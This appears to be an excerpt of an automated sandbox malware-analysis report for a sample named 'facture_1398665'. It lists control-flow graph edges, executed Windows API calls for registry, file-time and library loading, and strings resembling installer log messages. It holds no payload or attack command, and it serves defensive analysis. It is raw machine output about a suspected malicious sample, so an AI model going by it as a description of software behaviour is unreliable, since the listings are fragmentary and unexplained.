40649c 12 API calls 80615->80624 80616->80615 80620 4c815d 80616->80620 80621 4c8526 80617->80621 80622 4c806f 80618->80622 80623 4c855d 80619->80623 80626 40649c 12 API calls 80620->80626 80684 4c6914 174 API calls 80621->80684 80629 45b0c8 170 API calls 80622->80629 80685 4c6914 174 API calls 80623->80685 80627 4c812a 80624->80627 80634 4c815b 80626->80634 80632 45b0c8 170 API calls 80627->80632 80631 4c8090 80629->80631 80630 4c8534 80633 45b010 170 API calls 80630->80633 80636 4069f8 12 API calls 80631->80636 80635 4c814b 80632->80635 80660 4c8547 80633->80660 80642 4c81c4 80634->80642 80643 4c8186 80634->80643 80644 4c8252 80634->80644 80639 4069f8 12 API calls 80635->80639 80638 4c80a0 80636->80638 80637 4c82eb 80640 40649c 12 API calls 80637->80640 80641 45b0c8 170 API calls 80638->80641 80639->80634 80646 4c82e9 80640->80646 80647 4c80b4 80641->80647 80648 40649c 12 API calls 80642->80648 80645 40649c 12 API calls 80643->80645 80644->80637 80651 4c82a4 80644->80651 80649 4c819a 80645->80649 80682 4c74a4 52 API calls 80646->80682 80647->80616 80650 45b0c8 170 API calls 80647->80650 80655 4c81c2 80648->80655 80661 4069f8 12 API calls 80649->80661 80653 4c80db 80650->80653 80654 40649c 12 API calls 80651->80654 80656 4069f8 12 API calls 80653->80656 80658 4c82b8 80654->80658 80681 4c7358 52 API calls 80655->80681 80656->80616 80657 4c8316 80666 4c837d 80657->80666 80667 4c8321 80657->80667 80662 45b0c8 170 API calls 80658->80662 80660->80337 80661->80655 80664 4c82d9 80662->80664 80663 4c81ed 80670 4c8254 80663->80670 80671 4c81f8 80663->80671 80665 4069f8 12 API calls 80664->80665 80665->80646 80668 40649c 12 API calls 80666->80668 80669 40649c 12 API calls 80667->80669 80673 40649c 12 API calls 80670->80673 80674 40649c 12 API calls 80671->80674 80673->80644 80677 4c820c 80674->80677 80677->80644 80680->80336 80681->80663 80682->80657 80684->80630 80685->80660 80686->80339 80687->80339 80688->80344 80689->80344 81067 4ca018 80853->81067 80855 4c9fa8 80855->80504 81056 4118fc 44 API calls 80855->81056 81068 45b0c8 170 API calls 81067->81068 81069 4ca051 81068->81069 81118 4c3b78 81069->81118 81071 4ca059 81072 45b100 170 API calls 81071->81072 81073 4ca063 81072->81073 81074 4ca076 81073->81074 81076 4ca095 81073->81076 81133 4e11bc 77 API calls 81074->81133 81077 4ca0ef 81076->81077 81079 4ca0d3 81076->81079 81078 4ca0f7 81077->81078 81082 4ca19a 81077->81082 81083 4ca1ce 81078->81083 81088 4ca17b 81078->81088 81134 4e11bc 77 API calls 81079->81134 81080 4ca090 81080->80855 81082->81083 81084 4ca1af 81082->81084 81086 4ca1f2 81083->81086 81090 4ca211 81083->81090 81136 4e11bc 77 API calls 81084->81136 81137 4e11bc 77 API calls 81086->81137 81135 4e11bc 77 API calls 81088->81135 81091 406bec 13 API calls 81090->81091 81120 4c3b93 81118->81120 81119 40c6b4 13 API calls 81119->81120 81120->81119 81122 47ea84 13 API calls 81120->81122 81123 406448 12 API calls 81120->81123 81124 4c3bdc 81120->81124 81142 47e940 81120->81142 81122->81120 81123->81120 81124->81071 81133->81080 81134->81080 81135->81080 81136->81080 81137->81080 81143 406448 12 API calls 81142->81143 81145 47e951 81143->81145 81144 406eb8 12 API calls 81144->81145 81145->81144 81147 47e994 81145->81147 81146 47e9da 81146->81120 81147->81146 81148 406cbc 12 API calls 81147->81148 81148->81147

    Executed Functions

    APIs
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
      • Part of subcall function 004AD5D8: GetLastError.KERNEL32(00000000,004AD62E,?,?,?,?,?,?,?,?,?,?,004B6117,00000000,004B62D8), ref: 004AD610
    • LocalFileTimeToFileTime.KERNEL32(?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000,00000000), ref: 004CF6F0
      • Part of subcall function 004AF630: FindClose.KERNEL32(00000000,000000FF,004CF708,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000), ref: 004AF646
    • CompareFileTime.KERNEL32(?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000,00000000), ref: 004CFAF5
    • CompareFileTime.KERNEL32(?,?,?,?,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000), ref: 004CFB15
      • Part of subcall function 004AD314: GetFileAttributesW.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD34D
      • Part of subcall function 004AD314: GetLastError.KERNEL32(00000000,00000000,004AD373,?,?), ref: 004AD355
      • Part of subcall function 004AD6C0: SetFileAttributesW.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD6FB
      • Part of subcall function 004AD6C0: GetLastError.KERNEL32(00000000,?,00000000,004AD721,?,?,?,?), ref: 004AD703
      • Part of subcall function 004CC9E0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004CC9E8
      • Part of subcall function 004CC9E0: FileTimeToSystemTime.KERNEL32(?,?,?), ref: 004CC9F7
      • Part of subcall function 004CE410: GetLastError.KERNEL32(00000000,004CE619,?,0050BE1C,00000000,00000000,00000000,00000000,?,004CE98A,?,00000000,004CEAD4,?,?,0050BE1C), ref: 004CE4E9
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00000008,00000005,00000000,00000000), ref: 004CE567
      • Part of subcall function 004CE410: SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004CE58C
    • SetFileTime.KERNEL32(?,00000000,00000000,?,004CFEE7,?,00000000,004CFF9A,?,?,00000000,004D0589,?,00000000,004D05D4), ref: 004CFF11
      • Part of subcall function 004AEE2C: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AEF57
      • Part of subcall function 004AEE2C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000004,?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AEFBD
      • Part of subcall function 004AEE2C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000004,?,?,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AEFEF
      • Part of subcall function 004AEE2C: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AF07B
      • Part of subcall function 004AEE2C: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,00000000,00000004,?,00000000,?,00000000,004AF007,?,00000000,004AF0E1), ref: 004AF096
      • Part of subcall function 004AEE2C: RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,?,00000000,00000000,?,00000000,?,00000000,004AF007,?,00000000), ref: 004AF09F
      • Part of subcall function 004CEF58: GetLastError.KERNEL32(?,00000000,?,00000000), ref: 004CEFD1
      • Part of subcall function 004CF09C: GetLastError.KERNEL32(?,00000000), ref: 004CF0EE
      • Part of subcall function 004B50B8: SysFreeString.OLEAUT32(?), ref: 004B510C
      • Part of subcall function 004AD13C: DeleteFileW.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD173
      • Part of subcall function 004AD13C: GetLastError.KERNEL32(00000000,00000000,004AD199,?,?,?), ref: 004AD17B
    Strings
    • tCP, xrefs: 004CFF37
    • Will register the file (a type library) later., xrefs: 004D0315
    • , xrefs: 004CF963, 004CFB38, 004CFBAC
    • Existing file is a newer version. Skipping., xrefs: 004CF99B
    • Will register the file (a DLL/OCX) later., xrefs: 004D0321
    • Installing the file., xrefs: 004CFCAA
    • -- File entry --, xrefs: 004CF47D
    • .tmp, xrefs: 004CFD61
    • Stripped read-only attribute., xrefs: 004CFC68
    • Time stamp of existing file: %s, xrefs: 004CF7CE
    • Version of our file: %u.%u.%u.%u, xrefs: 004CF894
    • Dest file exists., xrefs: 004CF757
    • Version of existing file: (none), xrefs: 004CFAA3
    • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 004CFC30
    • Dest filename: %s, xrefs: 004CF628
    • @, xrefs: 004CF53D
    • Existing file has a later time stamp. Skipping., xrefs: 004CFB6C
    • Same version. Skipping., xrefs: 004CFA8E
    • User opted not to overwrite the existing file. Skipping., xrefs: 004CFBE0
    • Version of our file: (none), xrefs: 004CF8A0
    • Failed to strip read-only attribute., xrefs: 004CFC74
    • Skipping due to "onlyifdestfileexists" flag., xrefs: 004CFC9B
    • InUn, xrefs: 004CFF23
    • Non-default bitness: 64-bit, xrefs: 004CF645
    • Installing into GAC, xrefs: 004D051B
    • Couldn't read time stamp. Skipping., xrefs: 004CFADE
    • Skipping due to "onlyifdoesntexist" flag., xrefs: 004CF76A
    • Incrementing shared file count (64-bit)., xrefs: 004D0392
    • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 004CFA79
    • Uninstaller requires administrator: %s, xrefs: 004CFF55
    • Time stamp of existing file: (failed to read), xrefs: 004CF7DA
    • Existing file is protected by Windows File Protection. Skipping., xrefs: 004CFB8B
    • Version of existing file: %u.%u.%u.%u, xrefs: 004CF921
    • Time stamp of our file: (failed to read), xrefs: 004CF743
    • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 004CFA5E
    • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 004CFA6D
    • Same time stamp. Skipping., xrefs: 004CFAFE
    • Non-default bitness: 32-bit, xrefs: 004CF651
    • Time stamp of our file: %s, xrefs: 004CF737
    • Incrementing shared file count (32-bit)., xrefs: 004D03AC
    • Dest file is protected by Windows File Protection., xrefs: 004CF686
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 607 4e2284-4e2287 608 4e228c-4e2291 607->608 608->608 609 4e2293-4e22c9 call 4e1564 call 4b0d0c call 40c24c 608->609 616 4e2314-4e2331 call 47f29c call 406448 609->616 617 4e22cb-4e2312 call 4e1624 * 3 call 406448 609->617 624 4e2336-4e236c call 47e76c call 406448 call 47f23c 616->624 617->624 636 4e2372-4e2376 624->636 637 4e27b7-4e27be 624->637 638 4e2379-4e2396 call 4b0d0c call 40c24c 636->638 639 4e27c0-4e27c8 call 4da7e8 637->639 640 4e27cd-4e27d1 637->640 653 4e23a9-4e23b8 call 40c24c 638->653 654 4e2398-4e23a4 call 40649c 638->654 639->640 643 4e27d3-4e27e0 640->643 644 4e27e9-4e282c call 406448 * 3 640->644 643->644 645 4e27e2 643->645 664 4e287c-4e2885 call 40649c 644->664 665 4e282e-4e285d call 47e380 call 406914 call 47eb44 644->665 645->644 662 4e23cc-4e23db call 40c24c 653->662 663 4e23ba-4e23c7 call 40649c 653->663 661 4e27ab-4e27b1 654->661 661->637 661->638 675 4e23e9-4e23f8 call 40c24c 662->675 676 4e23dd-4e23e4 662->676 663->661 671 4e288a-4e28d4 call 4aaa68 call 4aaa28 664->671 665->671 689 4e285f-4e287a call 47e7fc call 4e17ac 665->689 695 4e28dd-4e28f3 call 4034d0 671->695 696 4e28d6-4e28d8 call 4e1788 671->696 685 4e23fa-4e2401 675->685 686 4e2406-4e2415 call 40c24c 675->686 676->661 685->661 693 4e2423-4e2432 call 40c24c 686->693 694 4e2417-4e241e 686->694 689->671 705 4e2440-4e244f call 40c24c 693->705 706 4e2434-4e243b 693->706 694->661 707 4e28fc-4e29ab call 4ab630 call 4d70b4 call 4e1d8c * 3 call 4e1e00 call 4e06a0 695->707 708 4e28f5-4e28f7 call 4e1788 695->708 696->695 715 4e245d-4e246c call 40c24c 705->715 716 4e2451-4e2458 705->716 706->661 744 4e29ad-4e29b6 707->744 745 4e2a09-4e2a2b call 480a80 707->745 708->707 722 4e246e-4e2475 715->722 723 4e247a-4e2489 call 40c24c 715->723 716->661 722->661 728 4e2497-4e24a6 call 40c24c 723->728 729 4e248b-4e2492 723->729 735 4e24b4-4e24c3 call 40c24c 728->735 736 4e24a8-4e24af 728->736 729->661 742 4e24c5-4e24cc 735->742 743 4e24d1-4e24e0 call 40c24c 735->743 736->661 742->661 757 4e24e2-4e24e9 743->757 758 4e24ee-4e24fd call 40c24c 743->758 746 4e29b8-4e29ba 744->746 747 4e29c0 744->747 755 4e2a37-4e2a39 745->755 756 4e2a2d-4e2a32 call 4b1ea0 745->756 746->747 751 4e29bc-4e29be 746->751 752 4e29c2-4e29d5 call 4d8c58 747->752 751->752 752->745 766 4e29d7-4e2a04 call 404098 * 2 call 47f1cc call 4e132c 752->766 760 4e2a44-4e2a56 755->760 761 4e2a3b-4e2a42 755->761 756->755 757->661 769 4e250b-4e251a call 40c24c 758->769 770 4e24ff-4e2506 758->770 767 4e2a64-4e2a67 call 4b2b6c 760->767 768 4e2a58-4e2a62 call 4b2988 760->768 761->760 765 4e2aa3-4e2c9d call 4b2bc8 call 406914 call 4b2bc8 call 47f17c call 406914 call 4b2bc8 call 4e07bc call 4e1e00 * 11 call 4e1964 * 2 761->765 906 4e2cb9-4e2cc5 765->906 907 4e2c9f-4e2cb4 call 404068 call 4e18c8 765->907 766->745 777 4e2a6c-4e2a74 767->777 768->777 784 4e251c-4e2529 call 406448 769->784 785 4e252e-4e253d call 40c24c 769->785 770->661 777->765 784->661 795 4e253f-4e254c call 406448 785->795 796 4e2551-4e2560 call 40c24c 785->796 795->661 806 4e258c-4e259b call 40c24c 796->806 807 4e2562-4e2587 call 4da798 call 482468 796->807 814 4e25c7-4e25d6 call 40c24c 806->814 815 4e259d-4e25c2 call 4da798 call 482468 806->815 807->661 827 4e25d8-4e25fd call 4da798 call 482468 814->827 828 4e2602-4e2611 call 40c24c 814->828 815->661 827->661 836 4e2636-4e2645 call 40c24c 828->836 837 4e2613-4e2631 call 47e6bc call 406448 828->837 849 4e266a-4e2679 call 40c24c 836->849 850 4e2647-4e2665 call 47e6bc call 406448 836->850 837->661 859 4e267b-4e2688 call 406448 849->859 860 4e268d-4e269c call 40c24c 849->860 850->661 859->661 870 4e26b0-4e26bf call 40c24c 860->870 871 4e269e-4e26ab call 406448 860->871 879 4e26c1-4e26ce call 406448 870->879 880 4e26d3-4e26e2 call 40c24c 870->880 871->661 879->661 887 4e26e4-4e26f3 call 40d1e8 880->887 888 4e26f8-4e2707 call 40c24c 880->888 887->661 896 4e2709-4e270d 888->896 897 4e2712-4e2721 call 40c24c 888->897 896->661 904 4e272c-4e273b call 40c24c 897->904 905 4e2723-4e272a 897->905 913 4e273d-4e274e call 40d1ac call 4d8a18 904->913 914 4e2750-4e275f call 40c24c 904->914 905->661 911 4e2cc7-4e2cdc call 404068 call 4e18c8 906->911 912 4e2ce1-4e2cf6 call 404098 906->912 907->906 911->912 913->661 927 4e2761-4e2775 call 40d1ac 914->927 928 4e2777-4e2786 call 40c24c 914->928 927->661 934 4e278f-4e279e call 40c24c 928->934 935 4e2788-4e278d call 4d91c4 928->935 934->661 940 4e27a0-4e27a8 call 40d1ac 934->940 935->661 940->661
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1435 408370-4083b3 GetModuleFileNameW RegOpenKeyExW 1436 4083b5-4083d1 RegOpenKeyExW 1435->1436 1437 408413-408456 call 408174 RegQueryValueExW 1435->1437 1436->1437 1438 4083d3-4083ef RegOpenKeyExW 1436->1438 1443 408458-408474 RegQueryValueExW 1437->1443 1444 40847c-408481 1437->1444 1438->1437 1440 4083f1-40840d RegOpenKeyExW 1438->1440 1440->1437 1442 4084ab-4084dd lstrcpynW GetThreadLocale GetLocaleInfoW 1440->1442 1446 4084e3-4084e8 1442->1446 1447 4085e8-4085ef 1442->1447 1443->1444 1445 408476 1443->1445 1448 408486-4084a3 RegCloseKey 1444->1448 1449 408483 1444->1449 1445->1444 1450 4084f5-40850d lstrlenW 1446->1450 1451 4084ea-4084ef 1446->1451 1449->1448 1453 408512-408516 1450->1453 1451->1447 1451->1450 1454 408518-408520 1453->1454 1455 408522-40852a 1453->1455 1454->1455 1457 40850f 1454->1457 1455->1447 1456 408530-408538 1455->1456 1458 408569-40856b 1456->1458 1459 40853a-408540 1456->1459 1457->1453 1458->1447 1462 40856d-408572 1458->1462 1460 408542 1459->1460 1461 408545-408567 lstrcpynW LoadLibraryExW 1459->1461 1460->1461 1461->1458 1462->1447 1463 408574-408580 1462->1463 1464 408585-4085ab lstrcpynW LoadLibraryExW 1463->1464 1465 408582 1463->1465 1464->1447 1466 4085ad-4085bf 1464->1466 1465->1464 1467 4085c1 1466->1467 1468 4085c4-4085e6 lstrcpynW LoadLibraryExW 1466->1468 1467->1468 1468->1447
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00400000,005027F0), ref: 0040838C
    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,005027F0), ref: 004083AC
    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,005027F0), ref: 004083CA
    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 004083E8
    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00408406
      • Part of subcall function 00408174: GetModuleHandleW.KERNEL32(kernel32.dll,0040B314,00400000,005027F0), ref: 00408191
      • Part of subcall function 00408174: GetProcAddress.KERNEL32(?,GetLongPathNameW,kernel32.dll,0040B314,00400000,005027F0), ref: 004081A8
      • Part of subcall function 00408174: lstrcpynW.KERNEL32(?,?,?), ref: 004081D8
      • Part of subcall function 00408174: lstrcpynW.KERNEL32(?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 00408247
      • Part of subcall function 00408174: lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 0040828F
      • Part of subcall function 00408174: FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082A2
      • Part of subcall function 00408174: FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082B8
      • Part of subcall function 00408174: lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082C4
      • Part of subcall function 00408174: lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000), ref: 00408300
      • Part of subcall function 00408174: lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314), ref: 0040830C
      • Part of subcall function 00408174: lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 0040832F
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 0040844F
    • RegQueryValueExW.ADVAPI32(?,00408698,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004084A4,?,80000001), ref: 0040846D
    • RegCloseKey.ADVAPI32(?,004084AB,00000000,?,?,00000000,004084A4,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0040849E
    • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 004084BB
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004084C8
    • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004084CE
    • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004084FC
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408552
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00408562
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408592
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004085A2
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004085D1
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 004085E1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • lstrcpynW.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000), ref: 004084BB
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004084C8
    • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004084CE
    • lstrlenW.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004084FC
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408552
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00408562
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00408592
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004085A2
    • lstrcpynW.KERNEL32(-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004085D1
    • LoadLibraryExW.KERNEL32(?,00000000,00000002,-00000002,?,00000105,?,00000000,00000002,-00000002,?,00000105,?,00000000,00000003,?), ref: 004085E1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsIconic.USER32(00000000), ref: 004737D0
      • Part of subcall function 0047DFA0: SetActiveWindow.USER32(?), ref: 0047DFDC
      • Part of subcall function 0047DFA0: SetFocus.USER32(00000000), ref: 0047E005
    • SetFocus.USER32(00000000), ref: 00473871
      • Part of subcall function 0047465C: SendMessageW.USER32(00000000,00000229,00000000,00000000), ref: 00474683
      • Part of subcall function 00457870: GetWindowThreadProcessId.USER32(00000000), ref: 0045787D
      • Part of subcall function 00457870: GetCurrentProcessId.KERNEL32(?,01484140,00000000,0047DF65,?,01484140,?,01484141,0047C338,?,?,?,?,01484140), ref: 00457886
      • Part of subcall function 00457870: GlobalFindAtomW.KERNEL32(00000000), ref: 0045789B
      • Part of subcall function 00457870: GetPropW.USER32(00000000,00000000), ref: 004578B2
    • GetParent.USER32(?), ref: 0047388C
      • Part of subcall function 00431848: InitializeCriticalSection.KERNEL32(00433F14,00433ED8,00000000,00000001,0043406E,00000000,?,00000000,00435659), ref: 00431868
    • SaveDC.GDI32(?), ref: 00473A33
    • RestoreDC.GDI32(?,?), ref: 00473AA4
    • GetWindowDC.USER32(00000000), ref: 00473B10
    • SaveDC.GDI32(?), ref: 00473B47
    • RestoreDC.GDI32(?,?), ref: 00473BAB
      • Part of subcall function 00478B00: InvalidateRect.USER32(00000000,00000000,000000FF), ref: 00478BB8
      • Part of subcall function 00478B00: InvalidateRect.USER32(00000000,00000000,000000FF), ref: 00478BFC
      • Part of subcall function 00460848: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000077), ref: 00460943
      • Part of subcall function 00460848: _TrackMouseEvent.COMCTL32(00000010), ref: 00460BFB
      • Part of subcall function 00460848: DefWindowProcW.USER32(00000000,?,?,?), ref: 00460C4D
      • Part of subcall function 00460848: GetCapture.USER32 ref: 00460CB8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(?,000000EC), ref: 00470ABA
    • IsIconic.USER32(?), ref: 00470AE8
    • IsWindowVisible.USER32(?), ref: 00470AF8
    • ShowWindow.USER32(?,00000000), ref: 00470B15
    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00470B28
    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00470B39
    • ShowWindow.USER32(?,00000006), ref: 00470B59
    • ShowWindow.USER32(?,00000005), ref: 00470B63
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
